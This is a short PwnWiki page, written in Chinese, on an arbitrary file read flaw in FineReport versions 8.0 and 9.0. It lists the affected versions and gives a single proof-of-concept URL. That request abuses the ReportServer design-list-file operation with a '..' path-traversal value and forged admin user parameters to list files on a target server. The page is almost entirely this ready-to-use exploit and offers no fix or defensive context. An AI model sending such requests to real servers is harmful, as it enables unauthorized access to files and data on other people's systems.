FineReport v8.0 - 9.0 任意文件讀取漏洞

From PwnWiki
Revision as of 20:58, 12 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> FineReport v8.0 FineReport v9.0 </pre> ==POC== <pre> http://<target>/WebReport/ReportServer?op=fs_remote_design&...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:

漏洞影響

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true